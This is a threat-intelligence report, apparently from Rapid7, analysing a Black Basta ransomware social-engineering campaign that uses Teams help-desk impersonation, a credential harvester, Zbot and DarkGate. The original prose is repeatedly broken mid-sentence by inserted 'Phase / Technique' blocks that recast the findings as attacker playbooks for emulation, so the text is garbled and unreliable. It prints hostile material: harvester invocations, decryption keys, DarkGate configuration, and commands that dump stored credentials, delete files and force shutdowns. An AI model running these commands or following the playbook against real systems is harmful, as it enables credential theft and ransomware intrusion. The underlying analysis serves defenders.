Black Basta Ransomware Campaign Drops Zbot, DarkGate, and Custom Malware Tyler McGraw Last updated at Fri, 17 Jan 2025 21:25:06 GMT Executive Summary Beginning in early October, Rapid7 has observed a resurgence of activity related to the ongoing social engineering campaign being conducted by Black Basta ransomware operators. Rapid7 initially reported the discovery of the novel social engineering campaign back in May, 2024, followed by an update in August 2024, when the operators updated their tactics and malware payloads and began sending lures via Microsoft Teams. Now, the procedures followed by the threat actors in the early stages of the social engineering attacks have been refined again, with new malware payloads, improved delivery, and increased defense evasion. Overview The social engineering attacks are still initiated in a similar manner. Users within the target environment will be email bombed by the threat actor, which is often achieved by signing up the user’s email to

Phase: Initial Access

• Technique: Email Bombing and Social Engineering
• Procedure: The attacker signs up the user's email address to multiple online subscriptions to overwhelm the inbox.

Phase: Initial Access

• Technique: Phishing via Microsoft Teams
• Procedure: The attacker sends a phishing message through Microsoft Teams, containing links or attachments with malicious content.

Phase: Execution

• Technique: JavaScript Execution
• Command: Execution of a JavaScript file attached or linked in the phishing message to run malicious code on the user’s machine.

Phase: Payload Delivery

• Technique: Use of Malicious Documents and Links
• Procedure: Users are tricked into downloading a document or clicking a link, leading to the download of malicious payloads (e.g., Zbot, DarkGate, and custom malware).

Phase: Defense Evasion

• Technique: Obfuscation
• Procedure: The malware uses obfuscation techniques to avoid detection by security solutions.

Phase: Persistence

• Technique: Scheduled Task Creation
• Command (inferred): Usage of scheduled tasks to establish persistence, likely via commands like schtasks /create with parameters for executing payloads at specified intervals.

Phase: Credential Access

• Technique: Credential Dumping
• Procedure (inferred): Likely use of tools such as Mimikatz or custom scripts to extract credentials from memory.

Phase: Lateral Movement

• Technique: Credential Use
• Procedure (inferred): Use of harvested credentials to move laterally across the network, possibly using tools like PsExec or WMI.

Phase: Impact

• Technique: Data Encryption for Impact
• Procedure: Deployment of Black Basta ransomware to encrypt files and demand ransom from the victim.

numerous mailing lists simultaneously. After the email bomb, the threat actor will reach out to the impacted users. Rapid7 has observed the initial contact still occurs primarily through usage of Microsoft Teams, by which the threat actor, as an external user, will attempt to call or message the impacted user to offer assistance. The account domains in use include both Azure/Entra tenant subdomains (e.g., username[@]tenantsubdomain[.]onmicrosoft[.]com) and custom domains (e.g., username[@]cofincafe[.]com). In many cases, Rapid7 has observed that the threat actor will pretend to be a member of the target organization’s help desk, support team, or otherwise present themself as IT staff. Below are examples of Microsoft Teams display names observed, by Rapid7, to be in use by operators. The display names may or may not be padded with whitespace characters. Rapid7 has also observed threat actors use a first and last name, as the chat display name and/or account username, to impersonate an IT staff member within the targeted organization. Operator Chat Display Name Help Desk HELP DESK Help Desk Manager Technical Support Administracion If the user interacts with the lure, either by answering the call or messaging back, the threat actor will attempt to get the user to install or execute a remote management (RMM) tool, including, but not limited to, QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect. Rapid7 has also observed attempts to leverage the OpenSSH client, a native Windows utility, to establish a reverse shell. In at least one instance, the threat actor shared a QR code with the targeted user. The purpose of the QR code is unconfirmed but appears to be an attempt to bypass MFA after stealing a user’s credentials. The URL embedded within the QR code adheres to the following format: hxxps://[.]qr-[.]com.

Phase: Initial Access

• Technique: Social Engineering via Phishing (Impersonation)
• Procedure: The threat actor uses Microsoft Teams to impersonate IT staff and contact users. Display names such as "Help Desk" and "Technical Support" are employed to build trust.

Phase: Execution

• Technique: Remote Management Tool Deployment

• Procedure: The attacker persuades the user to install or execute an RMM tool like QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect.

• Technique: Reverse Shell Establishment

• Command: Leverage the OpenSSH client to establish a reverse shell. Command syntax may include using PowerShell or cmd to invoke the SSH client for reverse connections.

Phase: Attack Techniques

• Technique: MFA Bypass Attempt
• Procedure: The attacker shares a QR code potentially designed to bypass MFA after credential theft. The URL embedded follows a specific pattern to appear legitimate.

This structured extraction can be used by a red team to simulate the attacker’s TTPs for security testing and training purposes.

Figure 1. A QR code (obfuscation by Rapid7) sent by an operator. In a majority of cases, Rapid7 has observed that the operator, after gaining access to the user’s asset via RMM tool, will then attempt to download and execute additional malware payloads. In one case handled by Rapid7, the operator requested more time — potentially to hand off the access to another member of the group. Figure 2. An operator stalls for time. The payload delivery methods vary per case, but have included external compromised SharePoint instances, common file sharing websites, servers rented through hosting providers, or even direct upload to the compromised asset in the case of RMM tool remote control. In one case, the operator used the group’s custom credential harvester to dump the user’s credentials, the results for which were subsequently uploaded to a file sharing site — publicly exposing the stolen credentials. SharePoint has been used to distribute copies of AnyDesk portable, likely to circumvent security measures that would prevent the user from downloading it directly from anydesk[.]com. Such attempts have been blocked by web proxy in previous cases. The overall goal following initial access appears to be the same: to quickly enumerate the environment and dump the user’s credentials. When possible, operators will also still attempt to steal any available VPN configuration files. With the user’s credentials, organization VPN information, and potential MFA bypass, it may be possible for them to authenticate directly to the target environment. Rapid7 has observed usage of the same credential harvesting executable, previously reported as AntiSpam.exe, though it is now delivered in the form of a DLL and most commonly executed via rundll32.exe. Whereas before it was an unobfuscated .NET executable, the program is now commonly contained within a compiled 64-bit DLL loader. Rapid7 has analyzed at least one sample that has also been obfuscated using the group’s custom packer. The newest versions of the credential harvester now save output to the file 123.txt in the user’s %TEMP% directory, an update from the previous qwertyuio.txt file, though versions of the DLL distributed earlier in the campaign would still output to the previous file.

Phase: Initial Access

• Technique: Use of Remote Monitoring and Management (RMM) Tools
• Procedure: Attacker gains access to user's asset via an RMM tool.

Phase: Execution

• Technique: Rundll32 Execution for Payload Delivery
• Command: rundll32.exe <path_to_DLL>,<entry_point>

Phase: Credential Dumping

• Technique: Custom Credential Harvester (DLL)
• Tool: AntiSpam.exe DLL version
• Procedure: Execution via rundll32.exe with output saved to 123.txt in user’s %TEMP% directory.

Phase: Persistence (Potential Inference)

• Technique: AnyDesk Portable Distribution
• Procedure: Distribute AnyDesk portable via SharePoint to evade security measures.

Phase: Reconnaissance

• Technique: Environment Enumeration
• Procedure: Enumerate the environment quickly following initial access.

Phase: Data Exfiltration

• Technique: Use of Public File Sharing Sites
• Procedure: Upload stolen credentials to a file-sharing site, publicly exposing them.

Figure 3. The credential harvesting prompt shown to the user upon executing the DLL (redaction by Rapid7). The credential harvester is most commonly followed by the execution of a loader such as Zbot (a.k.a. Zloader) or DarkGate. This can then serve as a gateway to the execution of subsequent payloads in memory, facilitate data theft, or otherwise perform malicious actions. Rapid7 has also observed operators distributing alternate payload archives containing Cobalt Strike beacon loaders and a pair of Java payloads containing a user credential harvester variant and a custom multi-threaded beacon by which to remotely execute PowerShell commands. In some cases, operators have sent the user a short command, via Teams, which will then begin an infection chain after execution by the targeted user. Rapid7 continues to observe inconsistent usage of the group’s custom packer to deliver various malware payloads, including their custom credential harvester. A YARA rule is now publicly available that can be used to detect the packer. For example, this packer was used to deliver several obfuscated versions of Black Basta ransomware, obtained via open source intelligence, which directly links operators to the ongoing social engineering campaign. At the time of writing, the threat actors behind the campaign continue to update both their strategy for gaining initial access and the tools subsequently used. For example, around the time the most recent campaign activity began, Rapid7 observed the delivery of a timestamped and versioned payload archive,

Phase: Initial Access

• Technique: Phishing with Malicious DLL
• Procedure: The attacker lures the user into executing a DLL that presents a credential harvesting prompt.

Phase: Execution

• Technique: Loader Execution
• Procedure: Execution of loaders such as Zbot (Zloader) or DarkGate to deliver payloads in memory.

Phase: Persistence

• Technique: Obfuscated Loaders
• Procedure: Use of a custom packer to deliver malware payloads, including credential harvesting and custom Cobalt Strike beacon loaders.

Phase: Command and Control

• Technique: PowerShell Remote Commands
• Procedure: Execution of PowerShell commands via a custom multi-threaded beacon delivered as a Java payload.

Phase: Lateral Movement

• Technique: Social Engineering via Teams
• Procedure: Sending a command through Teams to the user to initiate an infection chain.

Phase: Impact

• Technique: Ransomware Deployment
• Procedure: Deployment of Black Basta ransomware using obfuscated versions delivered through custom packers.

171024_V1US.zip (2024-10-17, version 1, US), which, when compared to a more recently delivered archive, 171124_V15.zip (2024-11-17, version 15), highlights the rapid iteration being undertaken. Many of the payloads being delivered follow a similar pattern as previous activity and often consist of a legitimate file where an export or function entry point has been overwritten to jump to malicious code, and the result is signed with a likely stolen code signing certificate. Intrusions related to the campaign should be taken seriously — the intent goes beyond typical phishing activity. Past campaign activity has led to the deployment of Black Basta ransomware. While Rapid7 has handled a high volume of incidents related to the current social engineering campaign across a variety of customer environments, to date, every case has been contained before the operator was able to move laterally beyond the targeted user’s asset. Technical Analysis Initial Access Each attack is preceded by the targeted user receiving an often overwhelming amount of emails. An operator will then attempt to contact the user via Microsoft Teams, either via messaging or calling, by which they will pretend to offer assistance. Operators will attempt to impersonate the organization’s help desk, such as using the names of existing staff members. During this social engineering stage, operators often need to troubleshoot with the user to establish remote control of the user’s asset. Based on the environment, for example, RMM tool downloads or execution may be blocked (often some, but not all) or QuickAssist may be disabled, causing the operator to cycle through their options at establishing a foothold. One of the most common first steps after gaining either the confidence of the user, or remote access, is to execute a custom credential harvester. Credential Harvesting The credential harvester used by operators, for example SafeStore.dll (SHA256: 3B7E06F1CCAA207DC331AFD6F91E284FEC4B826C3C427DFFD0432FDC48D55176), is an updated version of the previously analyzed program AntiSpam.exe. The DLL variant of the credential harvester is executed by a command like the following example: rundll32.exe SafeStore.dll,epaas_request_clone The module will quickly execute three enumeration commands to gather system information — systeminfo, route print, ipconfig /all — and then prompt the user for their password. The user’s credentials are appended onto a new line of the text file 123.txt with each attempt, after the enumeration command output, regardless of whether the credentials are correct. If the user enters the wrong password, they will be prompted to try again. The output for the enumeration commands and the user’s credentials were saved to the file qwertyuio.txt in older versions of the harvester, but are now saved to 123.txt, within the user’s %TEMP% directory. The enumeration commands within the updated version are executed via successive calls to CreateProcessA.

Phase: Initial Access

• Technique: Social Engineering via Email and Microsoft Teams
• Procedure: Operators send numerous emails followed by contacting the user on Microsoft Teams, impersonating the organization's help desk.

Phase: Execution

• Technique: Remote Access Tool
• Procedure: Utilize RMM tools or QuickAssist for remote control if enabled; otherwise, explore alternatives based on environment restrictions.

Phase: Credential Harvesting

• Technique: DLL Execution with Rundll32
• Command: rundll32.exe SafeStore.dll,epaas_request_clone
• Procedure: Executes system enumeration commands and prompts user for credentials:
• Commands:
  • systeminfo
  • route print
  • ipconfig /all
• Output: Appends enumeration data and user credentials to %TEMP%\123.txt.

Phase: System Information Discovery

• Technique: Command-Line Interface
• Commands:
• systeminfo
• route print
• ipconfig /all
• Procedure: Executed via CreateProcessA to gather system details and write outputs to a file.

Figure 4. Success and failure messages for the credential harvester. Based on analysis of one credential harvester sample, EventCloud.dll, the program was present in shellcode form. The shellcode is decrypted from the Cursor Group 880 resource embedded within the executable, using the XOR key 5A 3C 77 6E 33 30 4D 38 4F 38 40 78 41 58 51 30 42 5F 3F 67 71 00, and then injected locally. The following strings which were extracted from the shellcode show the output file and list dynamically loaded libraries: Credential Harvester Strings

cmd.exe /c %s%s %s%s%s%s 123.txt ooki Update filter kb_outl Need credentials to update... Username: Password: ntdll.dll Gdi32.dll user32.dll msvcrt.dll ucrtbase.dll Comctl32.dll Advapi32.dll kernel32.dll - - The Java variant of the credential harvester, identity.jar, provides a similar prompt to the user, though when a password is entered it is appended, without the username, to a .txt file with a random 10-letter alphabetic name to the current working directory. The cancel button on the prompt, shown below, is not functional and the prompt is drawn on top of other windows, meaning that it will not close until the user

Phase: Execution

• Technique: Shellcode Injection
• Procedure: The shellcode within EventCloud.dll is decrypted using a specified XOR key and injected locally.

Phase: Credential Access

• Technique: Credential Harvesting via Prompt
• Procedure: The Java variant, identity.jar, displays a credential prompt to the user. Entered passwords are appended to a .txt file with a random 10-letter alphabetic name in the current working directory. The prompt's cancel button is non-functional and remains on top of other windows.

Phase: Execution (Command Line)

• Technique: Command Execution via cmd.exe
• Command: cmd.exe /c %s%s %s%s%s%s 123.txt ooki
• Context: This suggests a command execution involving concatenation of variables and output to a text file 123.txt.

Observed Libraries Loaded:

• DLLs:
• ntdll.dll
• Gdi32.dll
• user32.dll
• msvcrt.dll
• ucrtbase.dll
• Comctl32.dll
• Advapi32.dll
• kernel32.dll

These libraries are possibly used for various functions related to the credential harvesting and execution process.

has entered their password correctly. Figure 5. The credential harvesting prompt created by identity.jar. Malware Payloads Following execution of a credential harvester, an operator will typically infect the asset with Zbot or DarkGate. One of the Zbot samples delivered after initial access, SyncSuite.exe (SHA256: DB34E255AA4D9F4E54461571469B9DD53E49FEED3D238B6CFB49082DE0AFB1E4) contains similar functionality and strings to other Zbot/Zloader samples previously reported by ZScaler. However, in addition to previously observed strings, the sample also contains encrypted strings for an embedded command help menu, error messages, and more. Rapid7 observed the embedded malware version was 2.9.4.0. Upon execution, the malware will copy itself to a random folder within the %APPDATA% directory. If the file does not have its original filename however, the process will immediately exit. The malware also contains the functionality to establish persistence either via a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run or a scheduled task named after the executable, which executes the malware copy in %APPDATA% whenever the user logs on. After collecting the hostname, username, and the installation date from the InstallDate value contained within the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion, this data is concatenated (delimited by underscore characters) and encrypted, along with other config information. It is then stored within the user’s registry inside a random key created at HKCU\Software\Microsoft. The analyzed sample will also load a fresh copy of ntdll.dll to avoid hooking, which is then used to perform calls to

Phase: Initial Access

• Technique: Credential Harvesting
• Procedure: The threat actor uses identity.jar to present a credential prompt for harvesting user credentials.

Phase: Execution

• Technique: Malware Execution (Zbot)
• Program: SyncSuite.exe
• Procedure: Executes the Zbot malware, which then copies itself to a random folder within the %APPDATA% directory. If the malware is renamed, it will immediately exit.

Phase: Persistence

• Technique: Registry Run Key and Scheduled Task
• Procedure 1: Creates or modifies a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run to execute a copy of the malware in %APPDATA% upon user logon.
• Procedure 2: Establishes a scheduled task named after the executable to ensure persistent execution on user logon.

Phase: Defense Evasion

• Technique: Unhooked Execution
• Procedure: Loads a fresh copy of ntdll.dll to avoid potential hooking by security products.

Phase: Information Gathering

• Technique: System Information Discovery
• Procedure: Collects hostname, username, and installation date from the InstallDate value in the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion.

Phase: Data Exfiltration Preparation

• Technique: Data Encoding and Storage
• Procedure: Concatenates and encrypts the collected data with other configuration information, then stores the encrypted data within a randomly created key in the registry at HKCU\Software\Microsoft\.

NTAPI functions. SyncSuite.exe ultimately injects itself into a suspended instance of msedge.exe, created using NtCreateUserProcess and executed via ResumeThread, a technique known as Process Hollowing. All of the strings used by the malware are stored encrypted within the .rdata section along with the configuration. The strings are decrypted using an obfuscated loop that is ultimately a simple XOR operation with the hard coded key 16 EB D5 3E AA E6 51 09 14 D3 DF 18 AD D6 1B BD BE, which is also stored in the .rdata section. The configuration is decrypted using an RC4 key, F3 F9 F7 FB FA F3 F7 F7 FF F5 F2 F3 FA FD FE F2 for this sample. The decrypted configuration for SyncSuite.exe can be seen below, with empty rows removed. The configuration contains a different public RSA key and botnet ID than the one previously shared by ThreatLabz, indicating that the campaign is being run by a different affiliate. All decrypted strings from SyncSuite.exe can be seen in the Zbot Strings section following other Indicators of Compromise. Figure 6. The decrypted Zbot configuration for SyncSuite.exe (1264 bytes). Rapid7 has also observed the delivery of DarkGate malware following initial access. One payload archive

Phase: Defense Evasion

• Technique: Process Hollowing
• Procedure: SyncSuite.exe injects itself into a suspended instance of msedge.exe, created using NtCreateUserProcess and executed via ResumeThread.

Phase: Execution

• Technique: Code Injection
• Command/Procedure: Injection into msedge.exe after process is hollowed to execute malicious code.

Phase: Decryption

• Technique: Encrypted String Decryption

• Procedure: Strings are decrypted using an obfuscated loop with a simple XOR operation using the hardcoded key: 16 EB D5 3E AA E6 51 09 14 D3 DF 18 AD D6 1B BD BE.

• Technique: Configuration Decryption

• Procedure: Configuration is decrypted using an RC4 key: F3 F9 F7 FB FA F3 F7 F7 FF F5 F2 F3 FA FD FE F2.

Phase: Command and Control

• Technique: Dynamic Configuration Update
• Procedure: The decrypted configuration contains a different public RSA key and botnet ID, implying dynamic updates to maintain control and adapt to defenses.

These extracted procedures outline key techniques and processes employed in the attack, enabling red teams to emulate and study the methods used.

contained both a DarkGate infection initiation script, test.vbs, and an executable copy of the DarkGate malware itself, SafeFilter.exe (SHA256: EF28A572CDA7319047FBC918D60F71C124A038CD18A02000C7AB413677C5C161 ), though this copy is packed using the group’s custom packer. The final payload containing the DarkGate malware, after several layers of decrypting and loading, contains the version string 7.0.6. If the folder c:\debugg exists on the system when the malware is executed it will display the version number via MessageBoxA. The configuration for this sample can be seen below along with hard coded commands. Notably, the campaign ID for the sample appears to be drk2. Figure 7. DarkGate displays its version using a debug message box. The configuration is decrypted with the key ckcilIcconnh within a customized XOR loop near the beginning of execution to reveal CRLF delimited options. However, due to the implementation of the decryption loop, the keyspace is effectively reduced to that of a single byte (0-255), after the first byte. This makes the XOR key for the majority of the config 0x60, for this sample allowing for the encrypted data to be trivially bruteforced. Key-Value Pair (SafeFilter.exe DarkGate Config) Description 0=179.60.149[.]194| C2 domains or IP addresses, delimited with ‘|’ characters 8=No If enabled and the file C:\ProgramData\hedfdfd\Autoit3.exe does not exist, call MessageBoxTimeoutA using keys 11 and 12 and a timeout of 1770ms. 11=Error Used by key 8 as a message box title. 12=PyKtS5Q The string Error, base64 encoded with the custom alphabet zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=. Used by key 8 as a message box caption.

Phase: Initial Access

• Technique: Script Execution via VBS
• Procedure: Execution initiated through test.vbs which triggers further payload actions.

Phase: Execution

• Technique: Malware Deployment
• Program: SafeFilter.exe
• Description: This executable is an instance of the DarkGate malware, packed with a custom packer, and performs several layers of decrypting and loading.

Phase: Defense Evasion

• Technique: Custom Packer Usage
• Procedure: Custom-packed to avoid detection, requiring decryption to access the final payload.

Phase: Discovery

• Technique: Check for Specific Directory
• Procedure: Checks for the existence of c:\debugg directory to determine execution outcome (displays version number if exists).

Phase: Execution

• Technique: Display a Message Box
• Procedure: Uses MessageBoxA to display malware version number if certain conditions are met.

Phase: Execution

• Technique: Conditional Message Box Display
• Configuration Key 8: If C:\ProgramData\hedfdfd\Autoit3.exe does not exist, a message box is displayed using a timeout.

Phase: Decryption

• Technique: XOR Decryption
• Procedure: Configuration decrypted using key ckcilIcconnh within a custom XOR loop, with keyspace reduced effectively to a single byte (0x60).

Config Extraction Insight: - Campaign ID: drk2 - Conditions for Message Box Display: Based on configuration settings to show error message if certain files are missing.

This structured representation highlights the tactics and procedures used in the execution of the DarkGate malware, which can assist red teams in emulating attack scenarios for testing defensive capabilities.

Key-Value Pair (SafeFilter.exe DarkGate Config) Description 13=6 Unknown 14=Yes Unknown 15=80 C2 communication port. 1=Yes Enables infection. 32=Yes If enabled, attempt bypass of detected security products. For example, enables calls to RtlAdjustPrivilege and NtRaiseHardError to cause a crash if hdkcgae is not present in C:\temp\ and a Kaspersky product has been detected. 3=No If disabled, do an anti-vm display check. 4=No If enabled, compare system drive size to key 18. If below, exit. 18=100 Minimum drive size in GB. 6=No If enabled and key 3 is disabled, check the display for known virtual machine display strings using EnumDisplayDevicesA. If matched, exit. Failed to match properly when tested. 7=No If enabled, compare system RAM to key 19. If below, exit. 19=4096 Minimum RAM size in MB. 5=No If enabled, check the registry key ProcessorNameString at HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 for xeon. If found, exit. 21=No Unknown 22 Not present in the config for this sample, but is still checked for in the code. If enabled, set the variant string to DLL, otherwise ?. 23=Yes If enabled, set the variant string to AU3 for Autoit3 payloads. 31=No If enabled, set the variant string to AHK for AutoHotKey payloads. 25=drk2 Campaign ID 26=No Unknown 27=rsFxMyDX Decryption key, also used to bound/find payloads stored within other files. 28=No Unknown 29=2 Unknown 35=No Unknown tabla=IsUiPQ4&atzM5N=0($" 3]TGfyK8JYwvO61SAF{ndrDu ol29*RkmqCpgxeX[EH,V)}7j bZBc.WLh Unknown DarkGate Hard-coded Commands /c cd /d "C:\Users\User\AppData\Roaming" && move

Phase: Execution

• Technique: Execution of Malicious Configuration File
• Procedure: The attacker uses SafeFilter.exe with the DarkGate configuration to execute and manipulate system settings for the malware's functionality.

Phase: Defense Evasion

• Technique: Privilege Escalation and Security Software Evasion

• Command: Calls RtlAdjustPrivilege and NtRaiseHardError to crash the system if specific conditions are met (e.g., Kaspersky product detection).

• Technique: Anti-VM Checks

• Procedure: Uses EnumDisplayDevicesA to check for virtual machine display strings and may exit if virtualized environment characteristics are detected.

• Technique: System Checks

• Procedure: Compares system drive size (key 18, 100 GB minimum) and system RAM (key 19, 4096 MB minimum) against the configuration settings, exiting if below thresholds.

• Technique: Registry Key Inspection

• Command: Checks HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString for "xeon" string to identify virtual environments.

Phase: Command and Control

• Technique: C2 Communication
• Description: Utilizes port 80 for command and control communications.

Phase: File Manipulation

• Technique: File Renaming
• Command: /c cd /d "C:\Users\User\AppData\Roaming<browser_dir>" && move <browser_name> <browser_name><random_alphabet_string>
• Procedure: Moves and renames files within designated directories to obfuscate activity and maintain persistence.

Phase: Payload Variants

• Technique: Payload Type Determination
• Procedure: Sets variant strings for different payloads, such as Autoit3 ("AU3") and AutoHotKey ("AHK"), based on configuration settings.

Additional Configuration

• Campaign ID: Identified as drk2.
• Decryption Key: Utilized rsFxMyDX to manage and find encrypted payloads within files.

DarkGate Hard-coded Commands /c cd /d "C:\Users\User\AppData\Local" && move /c cmdkey /delete: /c cmdkey /list > c:\temp\cred.txt /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox* /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\hedfdfd\ & rmdir /s /q C: \ProgramData\hedfdfd\ /c shutdown -f -r -t 0 /c shutdown -f -s -t 0 /c wmic ComputerSystem get domain > C:\ProgramData\hedfdfd\fcadaab During execution, DarkGate will hash certain strings and use the result to create or check files at the directories C:\ProgramData\hedfdfd(mainfolder) and C:\temp. The hashing algorithm uses a randomized key generated at runtime, so the hashes across infections will be different. Commonly used strings and their resultant hash, for the analysis environment, are shown below. Path String DarkGate Custom Hash mainfolder hedfdfd logsfolder fhhcfhh settings dhkbbfc domain fcadaab mutex0 hfgdced mutex1 cekchde au3 dgfeabe c.txt adfcbdd cc.txt dehgaba script daaadeh fs.txt hdkcgae DarkGate may also change its behavior if a known security product is detected. This is achieved by using CreateToolhelp32Snapshot and related functions to loop through running processes which are compared to a hard-coded list. The malware will also check for known installation directories using GetFileAttributesA. If a security product is found, a flag will be set which may alter the execution path. Only the following products had associated flags: DarkGate “Supported” Security Products

Windows Defender Sophos Quick Heal MalwareBytes Panda Security Norton/Symantec ESET/ Nod32 Kaspersky Avast SentinelOne

Phase: Execution

• Technique: Command Prompt Execution
• Command 1: /c cd /d "C:\Users\User\AppData\Local" && move <browser_name> <browser_name><random_alphabet_string>
• Command 2: /c cmdkey /delete:
• Command 3: /c cmdkey /list > c:\temp\cred.txt

Phase: Defense Evasion

• Technique: File Deletion
• Command 1: /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox*
• Command 2: /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\hedfdfd\ & rmdir /s /q C:\ProgramData\hedfdfd\

Phase: Impact

• Technique: System Shutdown/Reboot
• Command 1: /c shutdown -f -r -t 0
• Command 2: /c shutdown -f -s -t 0

Phase: Discovery

• Technique: System Information Discovery
• Command: /c wmic ComputerSystem get domain > C:\ProgramData\hedfdfd\fcadaab

Additional Techniques

• Technique: Hashing for Obfuscation and File Creation

• Detail: DarkGate hashes strings with a randomized key at runtime to create or check files in specified directories.

• Technique: Process Discovery and Evasion

• Detail: Uses CreateToolhelp32Snapshot to loop through processes and GetFileAttributesA to check for security products, setting a flag to alter execution if detected.

These procedures outline how DarkGate carries out its operations, focusing on command execution, defense evasion, system manipulation, and dynamic behavior based on environment analysis.

DarkGate “Supported” Security Products

Bitdefender - - - - At the end of the first execution of the DarkGate payload, it will then attempt to inject itself into a host process. First, DarkGate will select the injection target by searching a list of hard coded directories for any executable that contains the string updatecore.exe, subdirectories included. The path C:\Program Files (x86)\Microsoft\EdgeUpdate\ is searched first, with the fallback being C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe. If a matching Edge executable is not found, the path C:\Program Files (x86)\Google\Update\ is then searched. If that also fails, the malware will attempt to use C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe. After successfully choosing the injection target, DarkGate will then inject itself into the target process using shellcode, terminating the original instance of the final DarkGate payload after executing the shellcode. When creating an instance of the target process to inject, DarkGate will also attempt to spoof the parent process ID (PPID) of the injection target by enumerating running processes for accessibility using OpenProcess and then randomly selecting one from an assembled list. The PPID of the target is then updated using UpdateProcThreadAttribute prior to creation with CreateProcessA. Execution of the injected process is coordinated by checking for the presence of two file based mutexes within C:\ProgramData\hedfdfd\ (mainfolder). Each instance of the DarkGate malware checks both of the file-based mutexes. The file mutex usage is checked via calls to CreateFileA using an exclusive share mode flag (0) and a creation disposition of CREATE_ALWAYS, which means that if the mutex is already in usage by another DarkGate instance the call will fail. If the call to both mutexes created by DarkGate, hfgdced and cekchde, fails, DarkGate will exit. As a result of having two mutexes, DarkGate will typically run within two injected process instances at the same time, so if one process is terminated, the remaining instance will spawn another. If a DarkGate instance is spawned and both calls to open the file based mutexes fail, indicating two existing DarkGate instances, the new instance will terminate. This technique is rarely used by malware developers and highlights the sophistication of DarkGate malware. DarkGate will unconditionally log keystrokes as well as clipboard data that is under 1024 bytes. The logged data is stored encrypted at C:\ProgramData\hedfdfd\fhhcfhh (mainfolder\logsfolder) within files named .log. The logged data may be sent directly to the C2 address contained within the config. A thread is also created to persist on infected systems by creating the Run key daaadeh (script) at HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The Run key will point to the copies of Autoit3.exe and the compiled AU3 script payload dgfeabe.a3x (au3) created at C: \ProgramData\hedfdfd (mainfolder), with the former executing the latter every time the user logs on. When the AU3 script is executed, DarkGate reinfects the system. The thread continuously monitors the text within the infected user’s active window however, sleeping 1500ms between checks, and will delete the registry key if a blacklisted application is detected. This list includes popular analysis tools such as Process Hacker, Process Monitor, Task Manager, and even the Windows Registry Editor. The DarkGate sample executed by SafeFilter.exe contains 78 remote commands, some of which can be seen below with their intended function. Every loop, the malware will re-send the text of the active window, user idle time, and whether or not the malware instance has admin rights, before checking for a command.

Phase: Execution

• Technique: Process Injection
• Procedure: DarkGate malware searches for executables in specified directories to inject itself. It prioritizes:
• C:\Program Files (x86)\Microsoft\EdgeUpdate\
• C:\Program Files (x86)\Google\Update\
• Fallback: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
• Technique: Process Hollowing with Shellcode
• Procedure: Injects shellcode into a target process, using OpenProcess and CreateProcessA to spoof the Parent Process ID (PPID).

Phase: Persistence

• Technique: Registry Run Key Modification
• Command:
• Creates a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run to persist via Autoit3.exe and dgfeabe.a3x.

Phase: Defense Evasion

• Technique: Mutex Usage for Multi-Instance Control
• Procedure: Uses mutexes hfgdced and cekchde within C:\ProgramData\hedfdfd\ to prevent multiple instances.
• Technique: Parent Process ID Spoofing
• Procedure: Spoofs PPID using UpdateProcThreadAttribute.

Phase: Credential Access

• Technique: Keylogging
• Procedure: Logs keystrokes and clipboard data under 1024 bytes, storing it encrypted at C:\ProgramData\hedfdfd\fhhcfhh.

Phase: Command and Control

• Technique: Remote Commands Execution
• Procedure: Cycles through 78 remote commands, logging active window text, user idle time, and admin status.

Phase: Detection Avoidance

• Technique: Environment Check for Analysis Tools
• Procedure: Continuously monitors running applications, deleting the Run key if blacklisted tools are detected, including Process Hacker and Task Manager.

These structured procedures provide a detailed framework for red teams to emulate the DarkGate attack techniques effectively.

Command ID Function 1000 Sleep for a randomized amount of time. 1004 Use MessageBoxA to display the message test msg. 1044,1045,1046 Click the user’s mouse at specified screen coordinates using SetCursorPos and successive calls to mouse_event. 1044 for double left-click. 1045 for single left click. 1046 for single right click. 1049 Create a remote shell via powershell.exe. 1059 Terminate process by PID. 1061 Inject DarkGate shellcode into a specified process or an Edge/Chrome process if none is selected. The shellcode is then executed via ResumeThread. 1062,1063,1064 Inject DarkGate shellcode into a specified process or cmd.exe if none is selected. The shellcode is then executed via CreateRemoteThread. 1066 Remove infection files by using cmd.exe to delete the staging directories C: \ProgramData\hedfdfd and c:\temp. 1071 Steal sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present. 1079 If admin, delete stored credentials found using cmdkey. 1080 Rename browser directories for Firefox, Chrome, and Brave if present after terminating the related browser executable. Attempt to steal Opera cookies if present, after terminating the process. 1081 Use NTAPI calls RtlAdjustPrivilege and NtRaiseHardError to crash the system. 1083 Use the shutdown command to turn the system off. 1084 Use the shutdown command to restart the system. 1089 If 1=Yes in config, reinfect system with AU3 payloads. 1093 Create a remote shell via cmd.exe. 1097 Infect system with AU3 variant. Creates the files script.a3x and Autoit3.exe in c:\temp and then executes script.a3x via Autoit3.exe using CreateProcessA. 1104 Infect system with AHK variant. Creates the files script.ahk, test.txt, and AutoHotkey.exe in c:\temp and then executes script.ahk via AutoHotkey.exe using CreateProcessA. 1108 Infect system with DLL variant. Creates the files libcurl.dll, test.txt, and GUP.exe in c:\temp and then executes GUP.exe via CreateProcessA. 1111 Create the files ransom.txt and decrypter.exe in c:\temp. Terminate decrypter.exe if already running and then execute decrypter.exe using CreateProcessA. Likely ransomware deployment method. DarkGate Remote Command Related Strings

